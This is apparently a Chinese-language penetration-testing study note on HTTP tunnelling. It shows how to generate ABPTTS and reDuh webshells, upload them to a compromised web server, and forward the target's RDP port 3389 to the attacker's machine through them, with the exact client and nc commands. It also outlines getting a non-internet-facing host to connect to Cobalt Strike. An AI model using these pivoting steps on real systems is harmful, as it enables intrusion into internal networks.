8月19日笔记

http隧道搭建(续)

ABPTTS安装使用

一款基于 SSL 加密的 HTTP 端口转发工具,全程通信数据加密,比 reGerog 都要稳定。使用 python2 编写,但是该工具只支持 aspx 和 jsp 脚本的网站。

下载地址:https://github.com/nccgroup/ABPTTS

下载依赖:pip2 install pycrypto httplib2

使用教程

复制代码
python2 abpttsfactory.py -o webshell

执行上面的命令会在ABPTTS目录下生成webshell目录

将对应脚本语言的文件上传到目标 web 目录下,访问如下。

这样就上传成功了。接下来输入以下指令(linux/mac):

复制代码
python2 abpttsclient.py -c webshell/config.txt -u http://192.168.5.138/abptts.jsp -f 127.0.0.1:3389/192.168.5.138:3389 --unsafetls

进行端口转发。会将目标机器的 3389 端口映射到本地的 3389 端口。

如果是windows版本的:

复制代码
python2 abpttsclient.py -c webshell\config.txt -u http://10.211.55.3:8080/shiro/abptts.jsp -f 127.0.0.1:3389/10.211.55.3:3389 --unsafetls

输入以下命令查看我们攻击机的端口有没有开放(kali):

复制代码
nc -zv localhost 3389

已经成功开放了。

现在只要用ssh和RDP到本地的3389端口就可以连接到目标主机的3389端口了。

reDuh

reDuh 是一款将 TCP 流量封装在 HTTP 流量中的工具。

下载地址:https://github.com/sensepost/reDuh

下载下来后打开servers的文件夹。

将对应脚本语言的文件上传到目标 web 目录下,访问如下。

进入reDuh/reDuhClient/dist的目录下,然后在本地执行如下命令

复制代码
java -jar reDuhClient.jar http://192.168.5.138/reDuh.jsp

根据返回的内容提示我们监听本地的1010端口。

重新开一个窗口,使用 nc 监听本地的 1010 端口,然后执行如下命令,将目标主机的 3389 端口映射到本地的 33389 端口。

复制代码
nc -vv localhost 1010
[createTunnel]33389:127.0.0.1:3389

然后连接本地的 33389 端口即可连接到目标内网的 3389 了。

不出网上线CS

我们打下了一个目标机器 192.168.5.138,但是该机器不出网,我们现在想让其上线CS。我们的思路是这样的,通过配置代理,让本地虚拟机 192.168.5.128 可以访问到目标机器。然后让本地虚拟机上线 cs,走 bind_tcp 去连接目标机器。(环境问题,明天继续整)

相关推荐
小oo呆20 分钟前
【学习心得】CMD终端设置Proxy的几个要点
运维·服务器·网络
云小逸1 小时前
【Nmap 设备类型识别技术】整体概况
服务器·c语言·网络·c++·nmap
路由侠内网穿透.1 小时前
fnOS 飞牛云 NAS 本地部署私人影视库 MoonTV 并实现外部访问
运维·服务器·网络·数据库·网络协议
hnult1 小时前
全功能学练考证在线考试平台,赋能技能认证
大数据·人工智能·笔记·课程设计
yangzheui2 小时前
【VUE2转VUE3学习笔记】-Day1:模板语法
vue.js·笔记·学习
Hammer_Hans2 小时前
DFT笔记27
笔记
Timmylyx05182 小时前
类欧几里得学习笔记
笔记·学习·算法
aluluka2 小时前
Emacs折腾日记(三十六)——打造个人笔记系统
笔记·python·emacs
d_b_2 小时前
UCIE 笔记(一)
笔记·学习·芯片
米羊1212 小时前
威胁识别(上)
网络·安全·web安全